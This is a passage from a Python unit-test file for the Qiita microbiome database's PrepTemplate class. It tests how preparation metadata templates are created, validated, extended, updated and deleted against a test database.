self.metadata.rename(columns={'center_name': 'bla.'}, inplace=True)\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_get_category(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n obs = pt.get_category('primer')\n exp = {\n '1.SKB2.640194': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM4.640180': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB3.640195': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB6.640176': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD6.640190': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM6.640187': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD9.640182': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM8.640201': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM2.640199': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD2.640178': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB7.640196': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD4.640185': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB8.640193': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM3.640197': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD5.640186': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB1.640202': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM1.640183': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD1.640179': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD3.640198': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB5.640181': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB4.640189': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB9.640200': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM9.640192': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD8.640184': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM5.640177': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM7.640188': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD7.640191': 'GTGCCAGCMGCCGCGGTAA'}\n self.assertEqual(obs, exp)\n\n def test_get_category_no_exists(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n pt.get_category('DOESNOTEXIST')\n\n def test_create_duplicate_header(self):\n \"\"\"Create raises an error when duplicate headers are present\"\"\"\n self.metadata['STR_COLUMN'] = pd.Series(['', '', ''],\n index=self.metadata.index)\n with self.assertRaises(qdb.exceptions.QiitaDBDuplicateHeaderError):\n qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n\n def test_create_bad_sample_names(self):\n # set a horrible list of sample names\n self.metadata.index = ['o()xxxx[{::::::::>', 'sample.1', 'sample.3']\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n\n def test_create_unknown_sample_names(self):\n # set two real and one fake sample name\n self.metadata_dict['NOTREAL'] = self.metadata_dict['SKB7.640196']\n del self.metadata_dict['SKB7.640196']\n self.metadata = pd.DataFrame.from_dict(self.metadata_dict,\n orient='index', dtype=str)\n # Test error raised and correct error given\n with self.assertRaises(qdb.exceptions.QiitaDBExecutionError) as err:\n qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n self.assertEqual(\n str(err.exception),\n 'Samples found in prep template but not sample template: 1.NOTREAL'\n )\n\n def test_create_shorter_prep_template(self):\n # remove one sample so not all samples in the prep template\n del self.metadata_dict['SKB7.640196']\n self.metadata = pd.DataFrame.from_dict(self.metadata_dict,\n orient='index', dtype=str)\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT sample_id\n FROM qiita.prep_%d\n WHERE sample_id != '%s'\"\"\" % (pt.id, self.QCN)\n qdb.sql_connection.TRN.add(sql)\n obs = qdb.sql_connection.TRN.execute_fetchindex()\n exp = [['1.SKB8.640193'], ['1.SKD8.640184']]\n self.assertEqual(obs, exp)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def _common_creation_checks(self, pt, fp_count, name):\n self.assertEqual(pt.name, name)\n self.assertEqual(pt.data_type(), self.data_type)\n self.assertEqual(pt.data_type(ret_id=True), self.data_type_id)\n self.assertEqual(pt.artifact, None)\n self.assertEqual(pt.investigation_type, 'Amplicon')\n self.assertEqual(pt.study_id, self.test_study.id)\n self.assertEqual(pt.status, \"sandbox\")\n exp_sample_ids = {'%s.SKB8.640193' % self.test_study.id,\n '%s.SKD8.640184' % self.test_study.id,\n '%s.SKB7.640196' % self.test_study.id}\n self.assertEqual(pt._get_sample_ids(), exp_sample_ids)\n self.assertEqual(len(pt), 3)\n exp_categories = {'str_column', 'ebi_submission_accession',\n 'run_prefix', 'barcode', 'primer', 'platform',\n 'instrument_model', 'experiment_design_description',\n 'library_construction_protocol', 'center_name',\n 'center_project_name', 'insdc_nulls', 'emp_status'}\n self.assertCountEqual(pt.categories, exp_categories)\n exp_dict = {\n '%s.SKB7.640196' % self.test_study.id: {\n 'barcode': 'CCTCTGAGAGCT',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L002_sequences',\n 'str_column': 'Value for sample 3',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'insdc_nulls': 'not applicable',\n 'emp_status': 'EMP'},\n '%s.SKB8.640193' % self.test_study.id: {\n 'barcode': 'GTCCGCAAGTTA',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 1',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'insdc_nulls': '3.6',\n 'emp_status': 'EMP'},\n '%s.SKD8.640184' % self.test_study.id: {\n 'barcode': 'CGTAGAGCTCTC',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 2',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'insdc_nulls': 'not applicable',\n 'emp_status': 'EMP'}\n }\n for s_id in exp_sample_ids:\n self.assertEqual(pt[s_id]._to_dict(), exp_dict[s_id])\n\n # prep files have been created\n filepaths = pt.get_filepaths()\n self.assertEqual(len(filepaths), 1)\n\n def test_validate_restrictions(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n pt = PT.create(self.metadata, self.test_study, self.data_type,\n name='New Prep For Test')\n success, message = pt.validate_restrictions()\n self.assertEqual(message, 'prep %d is missing columns \"target_gene, '\n 'target_subfragment\"' % pt.id)\n self.assertFalse(success)\n\n metadata = self.metadata.copy()\n metadata['target_gene'] = 'Should Warn'\n metadata['target_subfragment'] = 'V4'\n pt.extend(metadata)\n success, message = pt.validate_restrictions()\n self.assertEqual(message, 'prep %d has invalid values: \"Should '\n 'Warn\", valid values are: \"16S rRNA, 18S rRNA, '\n 'ITS1/2, LSU\"' % pt.id)\n self.assertFalse(success)\n\n metadata['target_gene'] = '16S rRNA'\n # as we are testing the update functionality of a prep info file, we\n # can also test that the timestamps are working correctly\n current_ct = pt.creation_timestamp\n current_mt = pt.modification_timestamp\n self.assertTrue(current_ct < current_mt)\n pt.update(metadata)\n self.assertEqual(current_ct, pt.creation_timestamp)\n self.assertTrue(current_mt < pt.modification_timestamp)\n success, message = pt.validate_restrictions()\n success, message = pt.validate_restrictions()\n self.assertEqual(message, '')\n self.assertTrue(success)\n\n # cleaning\n PT.delete(pt.id)\n\n def test_create(self):\n \"\"\"Creates a new PrepTemplate\"\"\"\n fp_count = qdb.util.get_count('qiita.filepath')\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type,\n name='New Prep For Test')\n self._common_creation_checks(pt, fp_count, \"New Prep For Test\")\n # checking that the creation and modification timestamps are within\n # 2 seconds of current time\n dsecs = (datetime.now() - pt.modification_timestamp).total_seconds()\n self.assertTrue(dsecs < 2)\n dsecs = (datetime.now() - pt.creation_timestamp).total_seconds()\n self.assertTrue(dsecs < 2)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_create_already_prefixed_samples(self):\n \"\"\"Creates a new PrepTemplate\"\"\"\n fp_count = qdb.util.get_count('qiita.filepath')\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata_prefixed, self.test_study, self.data_type)\n self._common_creation_checks(pt, fp_count,\n \"Prep information %s\" % pt.id)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_empty_prep(self):\n \"\"\"Creates a new PrepTemplate\"\"\"\n metadata = pd.DataFrame.from_dict(\n {'SKB8.640193': {}, 'SKD8.640184': {}}, orient='index', dtype=str)\n with self.assertRaises(ValueError):\n qdb.metadata_template.prep_template.PrepTemplate.create(\n metadata, self.test_study, self.data_type)\n\n def test_generate_files(self):\n fp_count = qdb.util.get_count(\"qiita.filepath\")\n self.tester.generate_files()\n obs = qdb.util.get_count(\"qiita.filepath\")\n # We just make sure that the count has been increased by 1, since\n # the contents of the files have been tested elsewhere.\n self.assertEqual(obs, fp_count + 1)\n\n def test_create_data_type_id(self):\n \"\"\"Creates a new PrepTemplate passing the data_type_id\"\"\"\n fp_count = qdb.util.get_count('qiita.filepath')\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n self._common_creation_checks(pt, fp_count,\n \"Prep information %s\" % pt.id)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_create_warning(self):\n \"\"\"Warns if a required columns is missing for a given functionality\n \"\"\"\n del self.metadata['barcode']\n pt = npt.assert_warns(\n qdb.exceptions.QiitaDBWarning,\n qdb.metadata_template.prep_template.PrepTemplate.create,\n self.metadata, self.test_study, self.data_type)\n\n self.assertEqual(pt.data_type(), self.data_type)\n self.assertEqual(pt.data_type(ret_id=True), self.data_type_id)\n self.assertEqual(pt.artifact, None)\n self.assertEqual(pt.investigation_type, 'Amplicon')\n self.assertEqual(pt.study_id, self.test_study.id)\n self.assertEqual(pt.status, 'sandbox')\n exp_sample_ids = {'%s.SKB8.640193' % self.test_study.id,\n '%s.SKD8.640184' % self.test_study.id,\n '%s.SKB7.640196' % self.test_study.id}\n self.assertEqual(pt._get_sample_ids(), exp_sample_ids)\n self.assertEqual(len(pt), 3)\n exp_categories = {'str_column', 'ebi_submission_accession',\n 'run_prefix', 'primer', 'platform', 'insdc_nulls',\n 'instrument_model', 'experiment_design_description',\n 'library_construction_protocol', 'center_name',\n 'center_project_name', 'emp_status'}\n self.assertCountEqual(pt.categories, exp_categories)\n exp_dict = {\n '%s.SKB7.640196' % self.test_study.id: {\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L002_sequences',\n 'str_column': 'Value for sample 3',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'insdc_nulls': 'not applicable',\n 'emp_status': 'EMP'},\n '%s.SKB8.640193' % self.test_study.id: {\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 1',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'insdc_nulls': '3.6',\n 'emp_status': 'EMP'},\n '%s.SKD8.640184' % self.test_study.id: {\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 2',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'insdc_nulls': 'not applicable',\n 'emp_status': 'EMP'}\n }\n for s_id in exp_sample_ids:\n self.assertEqual(pt[s_id]._to_dict(), exp_dict[s_id])\n\n # prep files have been created\n filepaths = pt.get_filepaths()\n self.assertEqual(len(filepaths), 1)\n\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_create_investigation_type_error(self):\n \"\"\"Create raises an error if the investigation_type does not exists\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id,\n 'Not a term')\n\n def test_create_duplicated_column_error(self):\n \"\"\"Create raises an error if the prep has a duplicated column name\"\"\"\n self.metadata['season_environment'] = self.metadata['primer']\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n\n def test_delete_error(self):\n \"\"\"Try to delete a prep template that already has preprocessed data\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBExecutionError):\n qdb.metadata_template.prep_template.PrepTemplate.delete(1)\n\n def test_delete_unkonwn_id_error(self):\n \"\"\"Try to delete a non existent prep template\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBUnknownIDError):\n qdb.metadata_template.prep_template.PrepTemplate.delete(30000)\n\n def test_delete_error_raw_data(self):\n \"\"\"Try to delete a prep template with a raw data attached to id\"\"\"\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n artifact = qdb.artifact.Artifact.create(\n self.filepaths, \"FASTQ\", prep_template=pt)\n\n with self.assertRaises(qdb.exceptions.QiitaDBExecutionError):\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n # cleaning\n qdb.artifact.Artifact.delete(artifact.id)\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_delete(self):\n \"\"\"Deletes prep template 2\"\"\"\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n exp = []\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT *\n FROM qiita.prep_template\n WHERE prep_template_id = %s\"\"\"\n qdb.sql_connection.TRN.add(sql, [pt.id])\n obs = qdb.sql_connection.TRN.execute_fetchindex()\n self.assertEqual(obs, exp)\n\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT *\n FROM qiita.study_prep_template\n WHERE prep_template_id = %s\"\"\"\n qdb.sql_connection.TRN.add(sql, [pt.id])\n obs = qdb.sql_connection.TRN.execute_fetchindex()\n self.assertEqual(obs, exp)\n\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT *\n FROM qiita.prep_template_sample\n WHERE prep_template_id = %s\"\"\"\n qdb.sql_connection.TRN.add(sql, [pt.id])\n obs = qdb.sql_connection.TRN.execute_fetchindex()\n self.assertEqual(obs, exp)\n\n with self.assertRaises(ValueError):\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT *\n FROM qiita.prep_%d\"\"\" % pt.id\n qdb.sql_connection.TRN.add(sql)\n\n def test_setitem(self):\n \"\"\"setitem raises an error (currently not allowed)\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBNotImplementedError):\n self.tester['1.SKM7.640188'] = \\\n qdb.metadata_template.prep_template.PrepSample('1.SKM7.640188',\n self.tester)\n\n def test_delitem(self):\n \"\"\"delitem raises an error (currently not allowed)\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBNotImplementedError):\n del self.tester['1.SKM7.640188']\n\n def test_to_file(self):\n \"\"\"to file writes a tab delimited file with all the metadata\"\"\"\n fd, fp = mkstemp()\n close(fd)\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n pt.to_file(fp)\n self._clean_up_files.append(fp)\n with open(fp, newline=None) as f:\n obs = f.read()\n\n self.assertEqual(obs, EXP_PREP_TEMPLATE.format(pt.id))\n\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_investigation_type_setter(self):\n \"\"\"Able to update the investigation type\"\"\"\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n self.assertEqual(pt.investigation_type, 'Amplicon')\n pt.investigation_type = \"Other\"\n self.assertEqual(pt.investigation_type, 'Other')\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n pt.investigation_type = \"should fail\"\n\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_investigation_type_instance_setter(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n pt.investigation_type = 'RNA-Seq'\n self.assertEqual(pt.investigation_type, 'RNA-Seq')\n\n def test_deprecated_setter(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n self.assertFalse(pt.deprecated)\n pt.deprecated = True\n self.assertTrue(pt.deprecated)\n pt.deprecated = False\n self.assertFalse(pt.deprecated)\n\n def test_status(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n self.assertEqual(pt.status, 'private')\n\n # Check that changing the status of the processed data, the status\n # of the prep template changes\n a = qdb.artifact.Artifact(1)\n a.visibility = 'public'\n self.assertEqual(pt.status, 'public')\n\n # New prep templates have the status to sandbox because there is no\n # processed data associated with them\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n self.assertEqual(pt.status, 'sandbox')\n\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_update_category(self):\n with self.assertRaises(qdb.exceptions.QiitaDBUnknownIDError):\n self.tester.update_category('barcode', {\"foo\": \"bar\"})\n\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n self.tester.update_category('missing column',\n {'1.SKB7.640196': 'bar'})\n\n neg_test = self.tester['1.SKB7.640196']['barcode']\n mapping = {'1.SKB8.640193': 'AAAAAAAAAAAA',\n '1.SKD8.640184': 'CCCCCCCCCCCC'}\n\n self.tester.update_category('barcode', mapping)\n\n self.assertEqual(self.tester['1.SKB7.640196']['barcode'],\n neg_test)\n self.assertEqual(self.tester['1.SKB8.640193']['barcode'],\n 'AAAAAAAAAAAA')\n self.assertEqual(self.tester['1.SKD8.640184']['barcode'],\n 'CCCCCCCCCCCC')\n\n neg_test = self.tester['1.SKB7.640196']['center_name']\n mapping = {'1.SKB8.640193': 'FOO',\n '1.SKD8.640184': 'BAR'}\n\n self.tester.update_category('center_name', mapping)\n\n self.assertEqual(self.tester['1.SKB7.640196']['center_name'], neg_test)\n self.assertEqual(self.tester['1.SKB8.640193']['center_name'], 'FOO')\n self.assertEqual(self.tester['1.SKD8.640184']['center_name'], 'BAR')\n\n def test_qiime_map_fp(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n exp = join(qdb.util.get_mountpoint('templates')[0][1],\n '1_prep_1_qiime_[0-9]*-[0-9]*.txt')\n self.assertRegex(pt.qiime_map_fp, exp)\n\n def test_check_restrictions(self):\n obs = self.tester.check_restrictions(\n [qdb.metadata_template.constants.PREP_TEMPLATE_COLUMNS['EBI']])\n self.assertEqual(obs, set())\n\n del self.metadata['primer']\n pt = npt.assert_warns(\n qdb.exceptions.QiitaDBWarning,\n qdb.metadata_template.prep_template.PrepTemplate.create,\n self.metadata, self.test_study, self.data_type)\n\n obs = pt.check_restrictions(\n [qdb.metadata_template.constants.PREP_TEMPLATE_COLUMNS['EBI'],\n qdb.metadata_template.constants.PREP_TEMPLATE_COLUMNS_TARGET_GENE[\n 'demultiplex']])\n self.assertEqual(obs, set())\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_artifact(self):\n \"\"\"Returns the artifact associated with the prep template\"\"\"\n self.assertEqual(self.tester.artifact, qdb.artifact.Artifact(1))\n\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n self.assertEqual(pt.artifact, None)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_artifact_setter_error(self):\n a = qdb.artifact.Artifact(1)\n with self.assertRaises(qdb.exceptions.QiitaDBError):\n self.tester.artifact = a\n\n def test_artifact_setter(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, '16S')\n self.assertEqual(pt.artifact, None)\n artifact = qdb.artifact.Artifact.create(\n self.filepaths, \"FASTQ\", prep_template=pt)\n self.assertEqual(pt.artifact, artifact)\n\n # here we can test that we can properly create a workflow but we are\n # going to add lot more steps to make it more complex by adding a\n # couple of new scenarios\n # 1/2. adds a new path that should be kept separate all the way; this\n # is to emulate what happens with different trimming (different\n # default parameter) and deblur (same for each of the previous\n # steps)\n sql = \"\"\"\n INSERT INTO qiita.default_workflow_node (\n default_workflow_id, default_parameter_set_id)\n VALUES (1, 2), (1, 10);\n INSERT INTO qiita.default_workflow_edge (\n parent_id, child_id)\n VALUES (7, 8);\n INSERT INTO qiita.default_workflow_edge_connections (\n default_workflow_edge_id, parent_output_id, child_input_id)\n VALUES (4, 1, 3)\"\"\"\n qdb.sql_connection.perform_as_transaction(sql)\n # 2/2. adds a new path that should be kept together and then separate;\n # this is to simulate what happens with MTX/WGS processing, one\n # single QC step (together) and 2 separete profilers\n sql = \"\"\"\n INSERT INTO qiita.default_parameter_set (\n command_id, parameter_set_name, parameter_set)\n VALUES (3, '100%',\n ('{\"reference\":1,\"sortmerna_e_value\":1,'\n || '\"sortmerna_max_pos\":'\n || '10000,\"similarity\":1.0,\"sortmerna_coverage\":1.00,'\n || '\"threads\":1}')::json);\n INSERT INTO qiita.default_workflow_node (\n default_workflow_id, default_parameter_set_id)\n VALUES (1, 17);\n INSERT INTO qiita.default_workflow_edge (\n parent_id, child_id)\n VALUES (7, 9);\n INSERT INTO qiita.default_workflow_edge_connections (\n default_workflow_edge_id, parent_output_id, child_input_id)\n VALUES (5, 1, 3)\n \"\"\"\n qdb.sql_connection.perform_as_transaction(sql)\n # Finally, we need to \"activate\" the merging scheme values of the\n # commands so they are actually different:\n # 31->'Pick closed-reference OTUs', 6->'Split libraries FASTQ'\n sql = \"\"\"\n UPDATE qiita.command_parameter\n SET check_biom_merge = true\n WHERE command_parameter_id IN (31, 6)\"\"\"\n qdb.sql_connection.perform_as_transaction(sql)\n\n wk = pt.add_default_workflow(qdb.user.User('test@foo.bar'))\n self.assertEqual(len(wk.graph.nodes), 5)\n self.assertEqual(len(wk.graph.edges), 3)\n self.assertCountEqual(\n [x.command.name for x in wk.graph.nodes],\n # we should have 2 split libraries and 3 close reference\n ['Split libraries FASTQ', 'Split libraries FASTQ',\n 'Pick closed-reference OTUs', 'Pick closed-reference OTUs',\n 'Pick closed-reference OTUs'])\n\n # now let's try to generate again and it should fail cause the jobs\n # are alrady created\n with self.assertRaisesRegex(ValueError, \"Cannot create job because \"\n \"the parameters are the same as jobs\"):\n pt.add_default_workflow(qdb.user.User('test@foo.bar'))\n\n # now let's test that an error is raised when there is no valid initial\n # input data; this moves the data type from FASTQ to taxa_summary for\n # the default_workflow_id = 1\n qdb.sql_connection.perform_as_transaction(\n 'UPDATE qiita.default_workflow SET artifact_type_id = 10 WHERE '\n 'default_workflow_id = 1')\n with self.assertRaisesRegex(ValueError, 'This preparation data type: '\n '\"16S\" and/or artifact type \"FASTQ\" does '\n 'not have valid workflows'):\n pt.add_default_workflow(qdb.user.User('test@foo.bar'))\n\n # cleaning\n qdb.artifact.Artifact.delete(artifact.id)\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_can_be_updated_on_new(self):\n \"\"\"test if the template can be updated\"\"\"\n # you can update a newly created pt\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n self.assertTrue(pt.can_be_updated({'barcode'}))\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_extend_add_samples(self):\n \"\"\"extend correctly works adding new samples\"\"\"\n md_2_samples = self.metadata.loc[('SKB8.640193', 'SKD8.640184'), :]\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n md_2_samples, self.test_study, self.data_type)\n\n npt.assert_warns(\n qdb.exceptions.QiitaDBWarning, pt.extend, self.metadata)\n\n exp_sample_ids = {'%s.SKB8.640193' % self.test_study.id,\n '%s.SKD8.640184' % self.test_study.id,\n '%s.SKB7.640196' % self.test_study.id}\n self.assertEqual(pt._get_sample_ids(), exp_sample_ids)\n\n # test error due to max number of samples during extend\n cmax = qdb.util.max_preparation_samples()\n sql = 'UPDATE settings SET max_preparation_samples = %s'\n qdb.sql_connection.perform_as_transaction(sql, [3])\n df = pd.DataFrame.from_dict(\n {'SKB1.640202': {'barcode': 'CCTCTGAGAGCT'}},\n orient='index', dtype=str)\n with self.assertRaisesRegex(ValueError, \"4 exceeds the max allowed \"\n \"number of samples: 3\"):\n pt.extend(df)\n\n # now test creation\n PT = qdb.metadata_template.prep_template.PrepTemplate\n qdb.sql_connection.perform_as_transaction(sql, [2])\n with self.assertRaisesRegex(ValueError, \"3 exceeds the max allowed \"\n \"number of samples: 2\"):\n PT.create(self.metadata, self.test_study, self.data_type)\n\n # cleaning\n qdb.sql_connection.perform_as_transaction(sql, [cmax])\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_extend_add_samples_error(self):\n \"\"\"extend fails adding samples to an already preprocessed template\"\"\"\n df = pd.DataFrame.from_dict(\n {'new_sample': {'barcode': 'CCTCTGAGAGCT'}},\n orient='index', dtype=str)\n with self.assertRaises(qdb.exceptions.QiitaDBError):\n qdb.metadata_template.prep_template.PrepTemplate(1).extend(df)\n\n def test_extend_add_cols(self):\n \"\"\"extend correctly adds a new columns\"\"\"\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n self.metadata['new_col'] = pd.Series(['val1', 'val2', 'val3'],\n index=self.metadata.index)\n\n npt.assert_warns(\n qdb.exceptions.QiitaDBWarning, pt.extend, self.metadata)\n\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT *\n FROM qiita.prep_{0}\n WHERE sample_id != '{1}'\"\"\".format(pt.id, self.QCN)\n qdb.sql_connection.TRN.add(sql)\n obs = dict(qdb.sql_connection.TRN.execute_fetchindex())\n exp = {'1.SKB7.640196': {\n 'barcode': 'CCTCTGAGAGCT',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L002_sequences',\n 'str_column': 'Value for sample 3',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'emp_status': 'EMP',\n 'new_col': 'val1'},\n '1.SKB8.640193': {\n 'barcode': 'GTCCGCAAGTTA',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 1',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'emp_status': 'EMP',\n 'new_col': 'val2'},\n '1.SKD8.640184': {\n 'barcode': 'CGTAGAGCTCTC',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 2',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'emp_status': 'EMP',\n 'new_col': 'val3'}}\n self.assertCountEqual(obs, exp)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_extend_update(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n self.metadata['new_col'] = pd.Series(['val1', 'val2', 'val3'],\n index=self.metadata.index)\n self.metadata['str_column']['SKB7.640196'] = 'NEW VAL'\n\n npt.assert_warns(\n qdb.exceptions.QiitaDBWarning, pt.extend_and_update, self.metadata)\n\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT *\n FROM qiita.prep_{0}\n WHERE sample_id != '{1}'\"\"\".format(pt.id, self.QCN)\n qdb.sql_connection.TRN.add(sql)\n obs = dict(qdb.sql_connection.TRN.execute_fetchindex())\n exp = {'1.SKB7.640196': {\n 'barcode': 